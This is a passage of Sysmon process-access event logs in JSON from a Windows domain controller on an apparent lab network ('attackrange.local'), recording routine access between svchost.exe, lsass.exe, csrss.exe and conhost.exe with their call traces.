08:03:08.539","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6388,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.539\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.539","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6389,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.539\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.539","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6390,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.539\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.539","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6391,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.539\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21BC-5F25-0000-001079AC0900}\r\nTargetProcessId: 4932\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.539","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21BC-5F25-0000-001079AC0900}","TargetProcessId":"4932","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6392,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.539\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.539","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6393,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.539\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.539","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6394,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.539\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.539","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6395,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.539\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.539","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
